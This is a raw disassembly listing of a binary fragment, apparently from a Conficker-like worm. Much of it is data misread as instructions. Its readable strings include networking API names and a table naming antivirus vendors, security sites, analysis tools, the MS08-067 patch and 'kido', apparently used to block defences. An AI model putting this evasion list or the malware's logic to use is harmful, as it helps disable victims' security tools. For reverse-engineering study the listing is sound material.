dec ebx
add edx, [eax+ebp*2+72h]
db 65h
popa
xor esi, fs:[edx]
dec esi
db 65h
js short near ptr loc_9A1EC9+1
add ch, cl
inc ecx
add edx, [ebx+75h]
jnb short loc_9A1ECE
outs dx, byte ptr gs:[esi]
loc_9A1E60: ; CODE XREF: .text:loc_9A1E1A�j
db 64h
push esp
push 64616572h
add [ecx+2], bh
dec edi
jo short loc_9A1ED2
outsb
push esp
push 64616572h
add [ebx], ch
loc_9A1E76: ; CODE XREF: .text:009A1E0F�j
; .text:loc_9A1E0D�j
repne add [edi+6Ch], eax
outsd
bound esp, [ecx+6Ch]
inc esi
jb short near ptr loc_9A1EE4+2
db 65h
add ch, cl
push 65724300h
popa
jz short loc_9A1EF1
push edx
db 65h
insd
outsd
jz short loc_9A1EF7
push esp
push 64616572h
loc_9A1E98: ; CODE XREF: .text:loc_9A1E29�j
add ah, dl
xchg eax, ebp
add edx, [edi+72h]
loc_9A1E9E: ; CODE XREF: .text:loc_9A1E3D�j
imul esi, [ebp+50h], 65636F72h
jnb short loc_9A1F1B
dec ebp
db 65h
insd
outsd
jb short near ptr loc_9A1F24+3
add ch, cl
insb
loc_9A1EB1: ; CODE XREF: .text:loc_9A1E41�j
add edx, [esi+69h]
jb short near ptr loc_9A1F24+6
jnz short near ptr loc_9A1F18+1
insb
inc ecx
insb
insb
outsd
arpl [ebp+78h], ax
add cl, dl
cmpsd
add dl, [edx+65h]
popa
db 64h
push eax
loc_9A1EC9: ; CODE XREF: .text:009A1E53�j
jb short near ptr loc_9A1F35+5
arpl [ebp+73h], sp
loc_9A1ECE: ; CODE XREF: .text:009A1E5C�j
jnb short near ptr loc_9A1F1B+2
db 65h
insd
loc_9A1ED2: ; CODE XREF: .text:009A1E6B�j
outsd
jb short near ptr loc_9A1F4D+1
add ds:74655303h, al
inc esi
imul ebp, [ebp+41h], 69727474h
loc_9A1EE4: ; CODE XREF: .text:009A1E7F�j
bound esi, [ebp+74h]
db 65h
jnb short near ptr loc_9A1F24+7
add dh, cl
arpl [eax], ax
inc ebx
jb short loc_9A1F56
loc_9A1EF1: ; CODE XREF: .text:009A1E8A�j
popa
jz short near ptr loc_9A1F57+2
push eax
jb short near ptr loc_9A1F60+6
loc_9A1EF7: ; CODE XREF: .text:009A1E90�j
arpl [ebp+73h], sp
jnb short loc_9A1F3D
add [edi], bl
dec esp
add cl, [edi+ebp*2+63h]
popa
insb
inc esi
jb short near ptr loc_9A1F6C+1
add gs:[ebx+3], dh
push esi
imul esi, [edx+74h], 516C6175h
jnz short near ptr loc_9A1F7A+1
jb short loc_9A1F91
loc_9A1F18: ; CODE XREF: .text:009A1EB6�j
add [edx-39h], cl
loc_9A1F1B: ; CODE XREF: .text:009A1EA6�j
; .text:loc_9A1ECE�j
add [edi+65h], eax
jz short near ptr loc_9A1F70+4
db 65h
insd
jo short loc_9A1F6A
loc_9A1F24: ; CODE XREF: .text:009A1EAC�j
; .text:009A1EB4�j ...
imul ebp, [ebp+4Eh], 41656D61h
add [ebp-0Fh], al
add [esi+72h], al
db 65h, 65h
dec esp
loc_9A1F35: ; CODE XREF: .text:loc_9A1EC9�j
imul esp, [edx+72h], 797261h
inc esp
loc_9A1F3D: ; CODE XREF: .text:009A1EFA�j
add edx, [ebx+79h]
jnb short near ptr loc_9A1FB3+3
db 65h
insd
push esp
imul ebp, [ebp+65h], 69466F54h
insb
loc_9A1F4D: ; CODE XREF: .text:009A1ED3�j
db 65h
push esp
imul ebp, [ebp+65h], 1BCCE00h
loc_9A1F56: ; CODE XREF: .text:009A1EEF�j
inc edi
loc_9A1F57: ; CODE XREF: .text:009A1EF2�j
db 65h
jz short loc_9A1FAD
jns short loc_9A1FCF
jz short near ptr loc_9A1FC2+1
insd
push esp
loc_9A1F60: ; CODE XREF: .text:009A1EF5�j
imul ebp, [ebp+65h], 4701BE00h
db 65h
jz short near ptr loc_9A1FBB+2
loc_9A1F6A: ; CODE XREF: .text:009A1F22�j
jns short near ptr loc_9A1FDD+2
loc_9A1F6C: ; CODE XREF: .text:009A1F06�j
jz short loc_9A1FD3
insd
push esp
loc_9A1F70: ; CODE XREF: .text:009A1F1E�j
imul ebp, [ebp+65h], 69467341h
insb
db 65h
push esp
loc_9A1F7A: ; CODE XREF: .text:009A1F14�j
imul ebp, [ebp+65h], 5202C500h
jz short loc_9A1FEF
push ebp
outsb
ja short near ptr loc_9A1FEF+1
outsb
add fs:[ecx+eax+47h], dh
db 65h
jz short loc_9A1FDD
outsd
loc_9A1F91: ; CODE XREF: .text:009A1F16�j
db 64h
jnz short loc_9A2000
db 65h
inc esi
imul ebp, [ebp+4Eh], 41656D61h
add bh, cl
xchg eax, [edx]
push eax
jb short near ptr dword_9A2014
arpl [ebp+73h], sp
jnb short loc_9A1FDD
xor cl, [esi+65h]
loc_9A1FAD: ; CODE XREF: .text:loc_9A1F57�j
js short loc_9A2023
add [edx+3], cl
push esp
loc_9A1FB3: ; CODE XREF: .text:009A1F40�j
push 64616572h
xor esi, [edx]
inc esi
loc_9A1FBB: ; CODE XREF: .text:009A1F67�j
imul esi, [edx+73h], 736D0074h
loc_9A1FC2: ; CODE XREF: .text:009A1F5C�j
jbe short near ptr loc_9A2025+2
jb short loc_9A203A
db 2Eh, 64h
insb
insb
add bh, cl
; ---------------------------------------------------------------------------
db 2 dup(0), 5Fh
; ---------------------------------------------------------------------------
loc_9A1FCF: ; CODE XREF: .text:009A1F5A�j
popa
db 64h
push 75h
loc_9A1FD3: ; CODE XREF: .text:loc_9A1F6C�j
jnb short near ptr byte_9A2049
pop edi
imul si, fs:[esi+0], 0D0h
loc_9A1FDD: ; CODE XREF: .text:009A1F8D�j
; .text:009A1FA8�j ...
add [edi+69h], bl
outsb
imul esi, [esp+esi*2+65h], 6D72h
add [ebx+61h], ah
insb
insb
outsd
loc_9A1FEF: ; CODE XREF: .text:009A1F81�j
; .text:009A1F85�j
arpl [eax], ax
add ss:[eax], al
insd
db 65h
insd
arpl [ebp+70h], bp
add al, dl
; ---------------------------------------------------------------------------
dd 74730000h
; ---------------------------------------------------------------------------
loc_9A2000: ; CODE XREF: .text:loc_9A1F91�j
jb short loc_9A2065
popa
jz short $+2
pop ecx
; ---------------------------------------------------------------------------
dw 0
aLabs db 'labs',0
db 'ß',0
align 10h
aSin db 'sin',0
dword_9A2014 dd 6F6C0000h, 67h, 74727473h ; CODE XREF: .text:009A1FA3�j
db 6Fh, 6Bh, 0
; ---------------------------------------------------------------------------
loc_9A2023: ; CODE XREF: .text:loc_9A1FAD�j
rol byte ptr [eax], 1
loc_9A2025: ; CODE XREF: .text:loc_9A1FC2�j
add [ecx+74h], ah
outsd
imul eax, [eax], 770000D0h
arpl [ebx+63h], si
jo short near ptr loc_9A20AC+1
add [ebx+63770000h], cl
loc_9A203A: ; CODE XREF: .text:009A1FC4�j
jnb short loc_9A209F
popa
jz short $+2
rol byte ptr [eax], 1
add [edi+77h], bl
arpl [ebx+64h], si
jnz short loc_9A20B9
; ---------------------------------------------------------------------------
byte_9A2049 db 3 dup(0) ; CODE XREF: .text:loc_9A1FD3�j
aMalloc db 'malloc',0
db 'Ð',0
align 2
aFree db 'free',0
db 'Ð',0
align 2
aMemcpy db 'memcpy',0
; ---------------------------------------------------------------------------
loc_9A2065: ; CODE XREF: .text:loc_9A2000�j
repne add [eax], al
insd
db 65h
insd
jnb short near ptr word_9A20D2
jz short $+2
rol byte ptr [eax], 1
add [edi+63h], dh
jnb short loc_9A20E9
jz short near ptr loc_9A20E9+1
add al, cl
; ---------------------------------------------------------------------------
dw 0
a_snwprintf db '_snwprintf',0
db 'Ð',0
align 2
aWcsncmp db 'wcsncmp',0
align 4
aWcsncpy db 'wcsncpy',0
db 2 dup(0), 5Fh
; ---------------------------------------------------------------------------
loc_9A209F: ; CODE XREF: .text:loc_9A203A�j
ja short near ptr dword_9A2104
jnb short near ptr loc_9A210F+2
imul esp, [ebx+6Dh], 70h
ja short loc_9A210F
loc_9A20AC: ; CODE XREF: .text:009A2032�j
jnb short loc_9A211C
arpl [ecx+74h], sp
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 6C736377h
db 65h
; ---------------------------------------------------------------------------
loc_9A20B9: ; CODE XREF: .text:009A2047�j
outsb
add al, dl
; ---------------------------------------------------------------------------
dd 775F0000h, 63697363h, 0D000706Dh, 735F0000h, 776C7274h
db 72h, 0
word_9A20D2 dw 0 ; CODE XREF: .text:009A206B�j
aStrstr db 'strstr',0
db 'Ð',0
align 2
a_strnicmp db '_strnicmp',0
db 0
; ---------------------------------------------------------------------------
loc_9A20E9: ; CODE XREF: .text:009A2074�j
; .text:009A2076�j
add [ebx+72h], dh
popa
outsb
add fs:[eax], al
add [edx+61h], dh
outsb
db 64h
add cl, dl
; ---------------------------------------------------------------------------
dd 735F0000h, 6972706Eh, 66746Eh
dword_9A2104 dd 74730000h, 68637272h ; CODE XREF: .text:loc_9A209F�j
db 72h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_9A210F: ; CODE XREF: .text:009A20AA�j
; .text:009A20A1�j
add [ebx+74h], dh
jb short loc_9A2182
arpl [eax+79h], si
; ---------------------------------------------------------------------------
db 0
dd 74730000h
; ---------------------------------------------------------------------------
loc_9A211C: ; CODE XREF: .text:loc_9A20AC�j
jb short loc_9A218A
outs dx, byte ptr gs:[esi]
add [ebx+735F0000h], bl
jz short loc_9A219A
imul esp, [ebx+6Dh], 0C20070h
add [ebx+74h], dh
jb short near ptr word_9A21A2
arpl [ecx+74h], sp
add [edi+6Ch], ch
db 65h
popa
jnz short loc_9A21B2
xor esi, [edx]
db 2Eh, 64h
insb
insb
add [ebx+61560000h], al
jb short near ptr loc_9A21B3+2
popa
outsb
jz short loc_9A2199
outsb
imul esi, [eax+eax+0], 73795300h
inc esi
jb short loc_9A21C1
db 65h
push ebx
jz short loc_9A21D2
imul ebp, [esi+67h], 53000000h
jns short loc_9A21DC
push ebx
jz short near ptr loc_9A21DD+1
imul ebp, [esi+67h], 6E654Ch
aad 0
add [ebx+79h], dl
jnb short loc_9A21BB
insb
insb
outsd
arpl [ebx+74h], dx
jb short near ptr loc_9A21EA+1
loc_9A2182: ; CODE XREF: .text:009A2112�j
outsb
add [si+0], ch
push esi
popa
loc_9A218A: ; CODE XREF: .text:loc_9A211C�j
jb short near ptr loc_9A21F3+2
popa
outsb
jz short loc_9A21D3
insb
db 65h
popa
jb short $+2
iret
; ---------------------------------------------------------------------------
dw 6873h
db 65h
; ---------------------------------------------------------------------------
loc_9A2199: ; CODE XREF: .text:009A214E�j
insb
loc_9A219A: ; CODE XREF: .text:009A2126�j
insb
xor esi, [edx]
db 2Eh, 64h
insb
insb
; ---------------------------------------------------------------------------
db 0
word_9A21A2 dw 0 ; CODE XREF: .text:009A2132�j
dd 65474853h, 65705374h, 6C616963h
db 46h, 6Fh
; ---------------------------------------------------------------------------
loc_9A21B2: ; CODE XREF: .text:009A213C�j
insb
loc_9A21B3: ; CODE XREF: .text:009A214A�j
db 64h, 65h
jb short near ptr loc_9A2206+1
popa
jz short near ptr word_9A2222
inc ecx
loc_9A21BB: ; CODE XREF: .text:009A2178�j
add [ebx+68h], dh
insb
ja short near ptr word_9A2222
loc_9A21C1: ; CODE XREF: .text:009A215A�j
jo short loc_9A222C
db 2Eh, 64h
insb
insb
; ---------------------------------------------------------------------------
db 0
dd 48530000h, 656C6544h
; ---------------------------------------------------------------------------
jz short loc_9A2237
loc_9A21D2: ; CODE XREF: .text:009A215E�j
push esi
loc_9A21D3: ; CODE XREF: .text:009A218E�j
popa
insb
jnz short loc_9A223C
inc ecx
add [ebx], dh
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_9A21DC: ; CODE XREF: .text:009A2167�j
push ebx
loc_9A21DD: ; CODE XREF: .text:009A216A�j
jz short loc_9A2251
push ebx
jz short loc_9A2254
dec ecx
push edi
add ds:74530000h, dh
loc_9A21EA: ; CODE XREF: .text:009A2180�j
jb short near ptr loc_9A223E+1
jz short near ptr loc_9A225D+3
dec ecx
inc ecx
add [edx+0], al
loc_9A21F3: ; CODE XREF: .text:loc_9A218A�j
add [ebx+48h], dl
inc esp
db 65h
insb
db 65h
jz short near ptr loc_9A225D+4
dec ebx
db 65h
jns short loc_9A2257
add [ecx+72657375h], cl
loc_9A2206: ; CODE XREF: .text:loc_9A21B3�j
xor esi, [edx]
db 2Eh, 64h
insb
insb
add [ecx+6E450000h], cl
jnz short loc_9A2281
push esp
push 64616572h
push edi
imul ebp, [esi+64h], 73776Fh
; ---------------------------------------------------------------------------
word_9A2222 dw 0 ; CODE XREF: .text:009A21B8�j
; .text:009A21BF�j
dd 44746547h, 7449676Ch
; ---------------------------------------------------------------------------
loc_9A222C: ; CODE XREF: .text:loc_9A21C1�j
db 65h
insd
add al, bl
; ---------------------------------------------------------------------------
dd 6F500000h
; ---------------------------------------------------------------------------
jnb short loc_9A22AA
dec ebp
loc_9A2237: ; CODE XREF: .text:009A21D0�j
db 65h
jnb short loc_9A22AD
popa
; ---------------------------------------------------------------------------
db 67h
; ---------------------------------------------------------------------------
loc_9A223C: ; CODE XREF: .text:009A21D5�j
db 65h
inc ecx
loc_9A223E: ; CODE XREF: .text:loc_9A21EA�j
add al, bl
ja short loc_9A22AB
outsb
imul ebp, [esi+65h], 6C642E74h
insb
; ---------------------------------------------------------------------------
db 0
dd 6E490000h
db 74h
; ---------------------------------------------------------------------------
loc_9A2251: ; CODE XREF: .text:loc_9A21DD�j
db 65h
jb short loc_9A22C2
loc_9A2254: ; CODE XREF: .text:009A21E0�j
db 65h
jz short near ptr word_9A229E
loc_9A2257: ; CODE XREF: .text:009A21FD�j
db 65h
jz short near ptr loc_9A229C+1
outsd
outsb
outsb
loc_9A225D: ; CODE XREF: .text:009A21EC�j
; .text:009A21F9�j
arpl gs:[ebp+64h], si
push ebx
jz short loc_9A22C6
jz short near ptr loc_9A22CA+2
; ---------------------------------------------------------------------------
db 0
dword_9A2268 dd 6E490000h, 6E726574h, 704F7465h, 416E65h, 6E490000h
; DATA XREF: .text:009B8200�o
dd 6E726574h
byte_9A2280 db 65h ; DATA XREF: .text:009B81F8�o
; ---------------------------------------------------------------------------
loc_9A2281: ; CODE XREF: .text:009A2212�j
jz short near ptr word_9A22D2
jo short loc_9A22EA
outsb
push ebp
loc_9A2287: ; DATA XREF: .text:009B81F4�o
jb short loc_9A22F5
inc ecx
add [eax+eax+0], dh
dec eax
loc_9A228F: ; DATA XREF: .text:009B81F0�o
jz short near ptr loc_9A2303+2
jo short near ptr dword_9A22E4
jnz short loc_9A22FA
jb short near ptr dword_9A2310
dec ecx
loc_9A2298: ; DATA XREF: .text:009B81EC�o
outsb
outsw
inc ecx
loc_9A229C: ; CODE XREF: .text:loc_9A2257�j
add [esi], ch
; ---------------------------------------------------------------------------
word_9A229E dw 0 ; CODE XREF: .text:loc_9A2254�j
dword_9A22A0 dd 65746E49h, 74656E72h ; DATA XREF: .text:009B81E8�o
byte_9A22A8 db 52h, 65h ; DATA XREF: .text:009B81E4�o
; ---------------------------------------------------------------------------
loc_9A22AA: ; CODE XREF: .text:009A2234�j
popa
loc_9A22AB: ; CODE XREF: .text:009A2240�j
db 64h
inc esi
loc_9A22AD: ; CODE XREF: .text:loc_9A2237�j
; DATA XREF: .text:009B81E0�o
imul ebp, [ebp+0], 4900006Dh
outsb
jz short loc_9A231D
loc_9A22B8: ; DATA XREF: .text:009B81DC�o
jb short near ptr loc_9A2327+1
db 65h
jz short near ptr loc_9A22FF+1
insb
outsd
loc_9A22BF: ; DATA XREF: .text:009B81D8�o
jnb short loc_9A2326
dec eax
loc_9A22C2: ; CODE XREF: .text:loc_9A2251�j
popa
outsb
loc_9A22C4: ; DATA XREF: .text:009B81D4�o
db 64h
insb
loc_9A22C6: ; CODE XREF: .text:009A2263�j
add gs:[edi+73h], dh
loc_9A22CA: ; CODE XREF: .text:009A2265�j
; DATA XREF: .text:009B81D0�o
xor bl, [edi+33h]
xor ch, [esi]
db 64h
insb
insb
; ---------------------------------------------------------------------------
word_9A22D2 dw 0 ; CODE XREF: .text:loc_9A2281�j
dword_9A22D4 dd 65670000h, 736F6874h, 6E796274h, 656D61h ; DATA XREF: .text:009B81CC�o
; .text:009B81C8�o
dword_9A22E4 dd 6E690000h ; CODE XREF: .text:009A2291�j
db 65h, 74h
; ---------------------------------------------------------------------------
loc_9A22EA: ; CODE XREF: .text:009A2283�j
pop edi
outsb
loc_9A22EC: ; DATA XREF: .text:009B81C4�o
jz short near ptr loc_9A235B+2
popa
; ---------------------------------------------------------------------------
db 0
dd 53570000h
; ---------------------------------------------------------------------------
inc ecx
loc_9A22F5: ; CODE XREF: .text:loc_9A2287�j
push ebx
jz short near ptr loc_9A2357+2
jb short near ptr loc_9A236D+1
loc_9A22FA: ; CODE XREF: .text:009A2293�j
jnz short near ptr loc_9A236A+2
loc_9A22FC: ; DATA XREF: .text:009B81C0�o
add [ecx+0], ch
loc_9A22FF: ; CODE XREF: .text:009A22BA�j
add [esi+74h], ch
outsd
loc_9A2303: ; CODE XREF: .text:loc_9A228F�j
; DATA XREF: .text:009B81BC�o
push 6C6F006Ch
xor esi, gs:[edx]
loc_9A230B: ; DATA XREF: .text:009B81B8�o
db 2Eh, 64h
insb
insb
; ---------------------------------------------------------------------------
db 0
dword_9A2310 dd 6F430000h, 74696E49h, 696C6169h ; CODE XREF: .text:009A2295�j
; DATA XREF: .text:009B81B4�o
db 7Ah
; ---------------------------------------------------------------------------
loc_9A231D: ; CODE XREF: .text:009A22B6�j
db 65h
inc ebp
loc_9A231F: ; DATA XREF: .text:009B81B0�o
js short $+2
push 6F430000h
loc_9A2326: ; CODE XREF: .text:loc_9A22BF�j
inc ebx
loc_9A2327: ; CODE XREF: .text:loc_9A22B8�j
jb short loc_9A238E
popa
jz short near ptr loc_9A238E+3
dec ecx
outsb
jnb short near ptr loc_9A239D+7
loc_9A2330: ; DATA XREF: .text:009B81AC�o
popa
outsb
arpl [ebp+0], sp
jz short $+2
loc_9A2337: ; DATA XREF: .text:009B81A8�o
add [ebx+6Fh], al
push ebp
outsb
loc_9A233C: ; DATA XREF: .text:009B81A4�o
imul ebp, [esi+69h], 6C616974h
imul edi, [edx+65h], 6300h
inc ebx
outsd
loc_9A234C: ; DATA XREF: .text:009B81A0�o
dec ecx
outsb
loc_9A234E: ; DATA XREF: .text:009B819C�o
imul esi, [ecx+ebp*2+61h], 657A696Ch
push ebx
loc_9A2357: ; CODE XREF: .text:009A22F6�j
arpl gs:[ebp+72h], si
loc_9A235B: ; CODE XREF: .text:loc_9A22EC�j
; DATA XREF: .text:009B8198�o
imul esi, [ecx+edi*2+0], 6C72756Dh
insd
outsd
outsb
loc_9A2366: ; DATA XREF: .text:009B8194�o
db 2Eh, 64h
insb
insb
loc_9A236A: ; CODE XREF: .text:loc_9A22FA�j
add [eax+0], ch
loc_9A236D: ; CODE XREF: .text:009A22F8�j
add [edi+62h], cl
loc_9A2370: ; DATA XREF: .text:009B8190�o
jz short near ptr loc_9A23D1+2
imul ebp, [esi+55h], 41726573h
outs dx, byte ptr gs:[si]
loc_9A237C: ; DATA XREF: .text:009B818C�o
jz short loc_9A23D1
jz short loc_9A23F2
imul ebp, [esi+67h], 75706D00h
jz short loc_9A23F2
outsb
loc_9A238A: ; DATA XREF: .text:009B8188�o
add [bp+di+61h], dh
loc_9A238E: ; CODE XREF: .text:loc_9A2327�j
; .text:009A232A�j
db 66h, 65h
jz short loc_9A240B
db 2Eh
insb
loc_9A2394: ; DATA XREF: .text:009B8184�o
imul esi, [esi+65h], 6F6F7200h
jz short loc_9A2408
loc_9A239D: ; CODE XREF: .text:009A232E�j
; DATA XREF: .text:009B8180�o
imul esi, [eax+eax+72h], 6E697369h
add [bx+si], al
loc_9A23A8: ; DATA XREF: .text:009B817C�o
jb short near ptr loc_9A240E+1
insd
outsd
jbe short near ptr loc_9A240E+1
insb
loc_9A23AF: ; DATA XREF: .text:009B8178�o
add [ecx+75h], dh
imul esp, [ebx+6Bh], 6C616568h
; ---------------------------------------------------------------------------
db 3 dup(0)
aPtsecurity db 'ptsecurity',0 ; DATA XREF: .text:009B8174�o
align 4
aPrevx db 'prevx',0 ; DATA XREF: .text:009B8170�o
align 10h
byte_9A23D0 db 70h ; DATA XREF: .text:009B816C�o
; ---------------------------------------------------------------------------
loc_9A23D1: ; CODE XREF: .text:loc_9A237C�j
; .text:loc_9A2370�j
arpl [edi+ebp*2+6Fh], si
insb
jnb short $+2
loc_9A23D8: ; DATA XREF: .text:009B8168�o
jo short loc_9A243B
outsb
db 64h
popa
; ---------------------------------------------------------------------------
db 3 dup(0)
aOnecare db 'onecare',0 ; DATA XREF: .text:009B8164�o
aNorton db 'norton',0 ; DATA XREF: .text:009B8160�o
align 10h
byte_9A23F0 db 6Eh, 6Fh ; DATA XREF: .text:009B815C�o
; ---------------------------------------------------------------------------
loc_9A23F2: ; CODE XREF: .text:009A237E�j
; .text:009A2387�j
jb short loc_9A2461
popa
outsb
; ---------------------------------------------------------------------------
dw 0
aNod32 db 'nod32',0 ; DATA XREF: .text:009B8158�o
align 10h
dword_9A2400 dd 7774656Eh, 616B726Fh ; DATA XREF: .text:009B8154�o
; ---------------------------------------------------------------------------
loc_9A2408: ; CODE XREF: .text:009A239B�j
jnb short near ptr loc_9A247B+2
outsd
loc_9A240B: ; CODE XREF: .text:loc_9A238E�j
arpl [ecx+61h], bp
loc_9A240E: ; CODE XREF: .text:loc_9A23A8�j
; .text:009A23AC�j
jz short near ptr loc_9A2470+5
jnb short $+2
; ---------------------------------------------------------------------------
dw 0
dword_9A2414 dd 2E63746Dh, 697273h, 766D736Dh, 7370h, 7466736Dh, 6973636Eh
; DATA XREF: .text:009B8150�o
; .text:009B814C�o
dd 0
aMirage db 'mirage',0 ; DATA XREF: .text:009B8144�o
align 4
byte_9A2438 db 6Dh, 69h, 63h ; DATA XREF: .text:009B8140�o
; ---------------------------------------------------------------------------
loc_9A243B: ; CODE XREF: .text:loc_9A23D8�j
jb short loc_9A24AC
jnb short near ptr loc_9A24AC+2
db 66h
jz short $+3
; ---------------------------------------------------------------------------
dw 0
aMcafee db 'mcafee',0 ; DATA XREF: .text:009B813C�o
align 4
aMalware db 'malware',0 ; DATA XREF: .text:009B8138�o
aKaspersky db 'kaspersky',0 ; DATA XREF: .text:009B8130�o
align 10h
byte_9A2460 db 6Bh ; DATA XREF: .text:009B812C�o
; ---------------------------------------------------------------------------
loc_9A2461: ; CODE XREF: .text:loc_9A23F2�j
aaa
arpl [edi+6Dh], bp
jo short loc_9A24DC
jz short near ptr word_9A24D2
outsb
loc_9A246A: ; DATA XREF: .text:009B8128�o
add [bp+si+6Fh], ch
jz short loc_9A24E4
loc_9A2470: ; CODE XREF: .text:loc_9A240E�j
; DATA XREF: .text:009B8124�o
imul eax, [eax], 6B690000h
popa
jb short loc_9A24EE
jnb short $+2
loc_9A247B: ; CODE XREF: .text:loc_9A2408�j
; DATA XREF: .text:009B8120�o
add [eax+61h], ch
jnz short near ptr word_9A24F2
loc_9A2480: ; DATA XREF: .text:009B811C�o
imul eax, [eax], 61680000h
arpl [ebx+73h], bp
outsd
db 66h
jz short $+3
; ---------------------------------------------------------------------------
db 3 dup(0)
aHackerwatch db 'hackerwatch',0 ; DATA XREF: .text:009B8118�o
aGrisoft db 'grisoft',0 ; DATA XREF: .text:009B8114�o
aGdata db 'gdata',0 ; DATA XREF: .text:009B8110�o
align 4
loc_9A24AC: ; CODE XREF: .text:loc_9A243B�j
; .text:009A243D�j
; DATA XREF: ...
db 66h
jb short loc_9A2514
db 65h
popa
jbe short $+2
loc_9A24B3: ; DATA XREF: .text:009B8108�o
add [esi+72h], ah
loc_9A24B6: ; DATA XREF: .text:009B8104�o
db 65h, 65h
sub eax, 66007661h
outsd
jb short loc_9A2534
imul ebp, [esi+65h], 74h
loc_9A24C7: ; DATA XREF: .text:009B8100�o
add [esi+2Dh], ah
jnb short near ptr byte_9A2531
arpl [ebp+72h], si
add gs:[eax], al
; ---------------------------------------------------------------------------
word_9A24D2 dw 0 ; CODE XREF: .text:009A2467�j
dword_9A24D4 dd 72702D66h, 746Fh ; DATA XREF: .text:009B80FC�o
; ---------------------------------------------------------------------------
loc_9A24DC: ; CODE XREF: .text:009A2465�j
; DATA XREF: .text:009B80F8�o
db 65h
ja short loc_9A2548
outs dx, dword ptr fs:[esi]
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_9A24E4: ; CODE XREF: .text:009A246E�j
; DATA XREF: .text:009B80F4�o
db 65h
jz short loc_9A2559
jnz short near ptr loc_9A2559+3
jz short $+2
loc_9A24EB: ; DATA XREF: .text:009B80F0�o
add [ebp+73h], ah
loc_9A24EE: ; CODE XREF: .text:009A2477�j
db 65h
jz short $+3
; ---------------------------------------------------------------------------
db 0
word_9A24F2 dw 0 ; CODE XREF: .text:009A247E�j
aEsafe db 'esafe',0 ; DATA XREF: .text:009B80EC�o
align 4
aEmsisoft db 'emsisoft',0 ; DATA XREF: .text:009B80E8�o
align 4
aDslreports db 'dslreports',0 ; DATA XREF: .text:009B80E4�o
align 4
loc_9A2514: ; CODE XREF: .text:loc_9A24AC�j
; DATA XREF: .text:009B80E0�o
db 64h
jb short loc_9A258E
bound eax, gs:[eax]
; ---------------------------------------------------------------------------
dw 0
aDefender db 'defender',0 ; DATA XREF: .text:009B80D8�o
align 4
aCyberTa db 'cyber-ta',0 ; DATA XREF: .text:009B80D4�o
byte_9A2531 db 3 dup(0) ; CODE XREF: .text:009A24CA�j
; ---------------------------------------------------------------------------
loc_9A2534: ; CODE XREF: .text:009A24BE�j
; DATA XREF: .text:009B80D0�o
arpl [eax+73h], si
arpl gs:[ebp+72h], si
add gs:[eax], al
; ---------------------------------------------------------------------------
dw 0
dword_9A2540 dd 666E6F63h, 656B6369h ; DATA XREF: .text:009B80CC�o
; ---------------------------------------------------------------------------
loc_9A2548: ; CODE XREF: .text:loc_9A24DC�j
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dword_9A254C dd 706D6F63h, 72657475h, 6F737361h ; DATA XREF: .text:009B80C8�o
db 63h
; ---------------------------------------------------------------------------
loc_9A2559: ; CODE XREF: .text:loc_9A24E4�j
; .text:009A24E7�j
imul esp, [ecx+74h], 7365h
loc_9A2560: ; DATA XREF: .text:009B80C4�o
arpl [edi+6Dh], bp
outsd
outs dx, dword ptr fs:[esi]
; ---------------------------------------------------------------------------
dw 0
aClamav db 'clamav',0 ; DATA XREF: .text:009B80C0�o
align 10h
aCentralcommand db 'centralcommand',0 ; DATA XREF: .text:009B80BC�o
align 10h
aCcollomb db 'ccollomb',0 ; DATA XREF: .text:009B80B8�o
align 4
byte_9A258C db 63h, 61h ; DATA XREF: .text:009B80B4�o
; ---------------------------------------------------------------------------
loc_9A258E: ; CODE XREF: .text:loc_9A2514�j
jnb short loc_9A2604
insb
arpl gs:[edi+70h], bp
jnb short $+2
loc_9A2597: ; DATA XREF: .text:009B80B0�o
add [edx+6Fh], ah
jz short loc_9A2604
jnz short near ptr dword_9A260C
jz short near ptr loc_9A2604+1
jb short $+2
; ---------------------------------------------------------------------------
dw 0
aAvira db 'avira',0 ; DATA XREF: .text:009B80AC�o
align 4
aAvgate db 'avgate',0 ; DATA XREF: .text:009B80A8�o
align 4
aAvast db 'avast',0 ; DATA XREF: .text:009B80A4�o
align 4
aArcabit db 'arcabit',0 ; DATA XREF: .text:009B80A0�o
aAntivir db 'antivir',0 ; DATA XREF: .text:009B809C�o
aAnti db 'anti-',0 ; DATA XREF: .text:009B8098�o
align 4
aAhnlab db 'ahnlab',0 ; DATA XREF: .text:009B8094�o
align 4
aAgnitum db 'agnitum',0 ; DATA XREF: .text:off_9B8090�o
aWireshark db 'wireshark',0 ; DATA XREF: .text:009B8088�o
align 10h
aUnlocker db 'unlocker',0 ; DATA XREF: .text:009B8084�o
align 4
aTcpview db 'tcpview',0 ; DATA XREF: .text:009B8080�o
; ---------------------------------------------------------------------------
loc_9A2604: ; CODE XREF: .text:loc_9A258E�j
; .text:009A259A�j ...
jnb short loc_9A267F
jnb short loc_9A266B
insb
db 65h
popa
outsb
; ---------------------------------------------------------------------------
dword_9A260C dd 0 ; CODE XREF: .text:009A259C�j
aScct_ db 'scct_',0 ; DATA XREF: .text:009B8078�o
align 4
aRegmon db 'regmon',0 ; DATA XREF: .text:009B8074�o
align 10h
aProcmon db 'procmon',0 ; DATA XREF: .text:009B8070�o
aProcexp db 'procexp',0 ; DATA XREF: .text:009B806C�o
aMs0806 db 'ms08-06',0 ; DATA XREF: .text:009B8068�o
aMrtstub db 'mrtstub',0 ; DATA XREF: .text:009B8064�o
aMrt_ db 'mrt.',0 ; DATA XREF: .text:009B8060�o
align 4
aMbsa_ db 'mbsa.',0 ; DATA XREF: .text:009B805C�o
align 10h
aKlwk db 'klwk',0 ; DATA XREF: .text:009B8058�o
align 4
aKido db 'kido',0 ; DATA XREF: .text:009B8054�o
; .text:009B8134�o
align 10h
aKb958 db 'kb958',0 ; DATA XREF: .text:009B8050�o
align 4
byte_9A2668 db 6Bh, 62h, 38h ; DATA XREF: .text:009B804C�o
; ---------------------------------------------------------------------------
loc_9A266B: ; CODE XREF: .text:009A2606�j
cmp [eax], esi
; ---------------------------------------------------------------------------
db 3 dup(0)
aHotfix db 'hotfix',0 ; DATA XREF: .text:009B8048�o
align 4
aGmer db 'gmer',0 ; DATA XREF: .text:009B8044�o
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_9A267F: ; CODE XREF: .text:loc_9A2604�j
; DATA XREF: .text:009B8040�o
add [esi+69h], ah
insb
db 65h
insd
outsd
outsb
